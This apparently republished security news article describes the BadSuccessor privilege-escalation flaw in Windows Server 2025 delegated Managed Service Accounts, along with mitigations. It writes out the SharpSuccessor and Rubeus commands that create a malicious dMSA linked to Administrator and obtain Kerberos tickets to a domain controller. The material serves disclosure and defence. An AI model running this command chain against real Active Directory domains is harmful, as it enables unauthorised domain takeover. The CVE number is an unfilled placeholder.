SharpSuccessor PoC Released to Weaponize Windows Server 2025 BadSuccessor Flaw
A critical privilege escalation vulnerability in Windows Server 2025’s delegated Managed Service Account (dMSA) feature enables attackers to compromise Active Directory domains using tools like SharpSuccessor.
This attack chain exploits default configurations to transform low-privileged users into Domain Admins through an abusable Kerberos ticket manipulation.
Below, we break down the technical mechanics, weaponization process, and defensive countermeasures.
1. Anatomy of the BadSuccessor Vulnerability
The vulnerability (CVE-2025-XXXX) stems from improper validation of the msDS-ManagedAccountPrecededByLink attribute during dMSA migration.
This attribute allows a dMSA to inherit privileges from any linked account without requiring administrative rights.
Attackers with CreateChild permissions on any Organizational Unit (OU) can:
- Create a malicious dMSA object
- Forge the
msDS-ManagedAccountPrecededByLinkattribute to reference high-value targets (e.g., Domain Admins) - Trigger Kerberos Ticket Granting Ticket (TGT) issuance for the spoofed identity
The Key Distribution Center (KDC) automatically grants Service Principal Name (SPN) resolution and ticket encryption to the dMSA, enabling unrestricted lateral movement
2. SharpSuccessor Weaponization Workflow
SharpSuccessor automates exploitation through a three-stage process:
Stage 1: dMSA Object Creation
powershellSharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA
This command creates a dMSA (attacker_dMSA) linked to the Administrator account, leveraging the compromised user jdoe’s CreateChild rights on the ou=test OU.
Stage 2: Kerberos Ticket Manipulation
powershellRubeus.exe tgtdeleg /nowrap
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt
tgtdelegrequests a TGT for the current user (jdoe)asktgsimpersonates the dMSA account, exploiting its forged link to Administrator
Stage 3: Domain Compromise
powershellRubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt
This final command grants access to the Domain Controller’s SMB service (cifs/), enabling pass-the-ticket attacks for credential harvesting or Golden Ticket creation.
3. Mitigation Strategies and dMSA Hardening
| Feature | gMSA | dMSA (Pre-Mitigation) |
|---|---|---|
| Auth Binding | Domain-wide | Machine-specific |
| Priv Esc Risks | Kerberoasting | Attribute hijacking (BadSuccessor) |
| Secret Storage | Automatic rotation in AD | Machine-bound via Credential Guard |
To mitigate:
- Restrict OU Permissions: Audit
CreateChildrights using PowerShell: powershellGet-ADOrganizationalUnit -Filter * | Get-ADObject -Properties nTSecurityDescriptor - Block Attribute Modifications: Deny write access to
msDS-ManagedAccountPrecededByLinkfor non-administrators - Enable Credential Guard: Enforce machine-bound authentication for dMSAs to prevent ticket theft
Microsoft has acknowledged the issue but has not yet released a patch. Organizations using Windows Server 2025 should prioritize these mitigations to prevent domain-wide compromise.
This attack underscores the risks of overly permissive OU permissions and insufficient validation of AD attribute changes.
By combining SharpSuccessor’s automation with Kerberos protocol weaknesses, attackers achieve full domain control with minimal effort.
Continuous monitoring of dMSA objects and strict adherence to least-privilege principles remain critical defenses.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
Source link
